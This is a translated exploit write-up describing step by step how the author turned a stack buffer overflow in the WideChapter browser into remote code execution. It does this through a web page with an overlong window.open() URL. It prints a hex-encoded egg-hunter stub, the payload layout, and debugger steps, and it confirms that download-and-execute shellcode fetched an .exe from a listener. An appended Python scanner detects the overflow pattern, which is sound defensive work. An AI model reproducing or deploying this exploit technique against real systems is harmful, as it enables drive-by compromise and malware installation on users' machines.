E-Mail: never@safechina.net
Homepage: http://www.safechina.net
WideChapter has a buffer overflow vulnerability (http://www.cnns.net/article/db/3521.htm). It looks like a simple stack overflow, but exploiting it presents one small difficulty.
According to the description, embedding the following JavaScript in a web page is enough to overwrite EIP:
<script>window.open("http://AAA..
A quick look first: I constructed http://aaa..[513 of them]xxxx, opened it with WideChapter, and SoftICE popped up. The stack overflow itself is straightforward; this layout should be enough:
http://aaa..[513] jmpesp nops shellcode
I immediately built HTML in this form, using jeno's download-execute shellcode with a local nc -l -p 80, but nothing happened. Strange. I replaced the NOPs in front of the shellcode with 0xeb 0xfe (jmp -1, an infinite loop), opened the HTML, and WideChapter appeared to hang. Ctrl+D to bring up SoftICE: it really was sitting in the infinite loop, so execution had reached the shellcode. Looking a little further down, though, the shellcode had been altered.
So the string is transformed before it is copied. I looked at it for a while and the transformation is not entirely clear, but roughly: uppercase letters become lowercase, words starting at 0x80 and above seem unchanged, words starting at 0xf0 and above get converted, and 0x7f is cut off (?). Shellcode cannot go here, so the only option is a search-and-jump stub. Writing such a stub whose bytes must survive the transformation was a bit tricky: I started at 9 o'clock and it was 10:30 by the time it worked. Here it is:
"\xba\x55\x54\x54\x54"              mov edx, 0x54545455
"\x4a"                              dec edx
"\x8b\xc4"                          mov eax, esp
"\x90"                              nop
"\x8b\x18"                          mov ebx, [eax]
"\x40\x40\x40\x40"                  inc eax ; x4
"\x3b\xda"                          cmp ebx, edx
"\x75\xf6"                          jne f6 ; jmp back
"\x40\x40\x40\x40\x40\x40\x40"      inc eax ; x7
"\x90"                              nop
"\x89\x40\x04"                      mov [eax+4], eax
"\x54"                              push esp
"\xff\x60\x04"                      jmp [eax+4]
The HTML to build now looks like this:
<script>window.open("http://A x 513[jmpesp] [nops] [searchcode]")</script>[shellcode]
The [shellcode] part needs a little preparation: first 7 bytes of 0x54 ('T'), then 6 (?) bytes of 0x90 (nop), then an eb 0f (jmp 0f), then about 20 bytes of 0x90 (nop), and only then jeno's shellcode. The jmp 0f is needed because the search stub contains mov [eax+4], eax, which is annoying and has to be skipped over.
Then I tested again, and it still failed... I honestly could not see anything wrong, so why? I again put 0xeb 0xfe (jmp -1, infinite loop) in front of the search stub, opened the file, Ctrl+D, and searched with s esp l ffffffff 54 54 54 54: it turned out there were other TTTT sequences on the stack before the real shellcode. After a long time choosing, I settled on 0xdadadada, which is guaranteed to locate our shellcode, and quickly replaced 0x54 with 0xda; the 0x55 in the search stub accordingly became 0xdb.
Still not entirely confident, I put 0x3bc074fc (cmp eax,eax & je -4) in front of the search stub, opened it in WideChapter, then Ctrl+D: it stops on the je -4, and after flipping the Z flag with r I could single-step through it.
F7 to the jmp [eax+4], then look at e eip: sure enough, we are at our shellcode. F10 onward and it jumps into jeno's shellcode, so that should count as success. g, and the nc -l -p 80 on the other side has already shown the request:
GET /a.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 127.0.0.1
Connection: Keep-Alive
The rest is details: this exploit only works the first time WideChapter opens the page; to make it general the search stub would need a small modification, but that is simple work.
[Responsible editor: Li Xuhai]
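From the defender's side, the page's trigger has a recognisable static signature: a window.open() call whose URL is hundreds of bytes of filler followed by non-printable bytes. The following scanner is an added example, not code from the article or from WideChapter; the thresholds and the two sample pages are constructed for illustration, with 512 chosen because the article reports that 513 filler characters reach the saved return address.

```python
import re

# Constructed sample pages (not from the article): a benign window.open() and one
# that follows the overlong-URL layout described above (filler, then raw bytes).
BENIGN_HTML = '<script>window.open("http://www.safechina.net/index.html")</script>'
SUSPICIOUS_HTML = (
    '<script>window.open("http://' + "a" * 513 + '\x8b\xc4\x90\x90")</script>'
    + "\xda" * 7 + "\x90" * 6
)

# Matches window.open("...") / window.open('...') and captures the URL argument.
WINDOW_OPEN_RE = re.compile(r'window\.open\s*\(\s*(["\'])(.*?)\1', re.DOTALL)

# Assumed thresholds for this example: a URL longer than this, or a run of one
# repeated character longer than this, is not what legitimate pages produce.
MAX_URL_LEN = 512
MAX_REPEAT = 64


def analyze_window_open(html):
    """Return one finding per window.open() URL found in the page.

    Each finding lists the reasons the URL looks like overflow filler:
    excessive length, a long run of a single character, or non-printable bytes.
    """
    findings = []
    for m in WINDOW_OPEN_RE.finditer(html):
        url = m.group(2)
        reasons = []
        if len(url) > MAX_URL_LEN:
            reasons.append("url_len=%d" % len(url))
        run = re.search(r"(.)\1{%d,}" % (MAX_REPEAT - 1), url)
        if run:
            reasons.append("repeated_char=%r x%d" % (run.group(1), len(run.group(0))))
        nonprint = sum(1 for c in url if ord(c) < 0x20 or ord(c) > 0x7E)
        if nonprint:
            reasons.append("nonprintable_bytes=%d" % nonprint)
        findings.append({"url_len": len(url), "reasons": reasons, "suspicious": bool(reasons)})
    return findings


if __name__ == "__main__":
    for name, page in (("benign", BENIGN_HTML), ("suspicious", SUSPICIOUS_HTML)):
        for f in analyze_window_open(page):
            print(name, f)
```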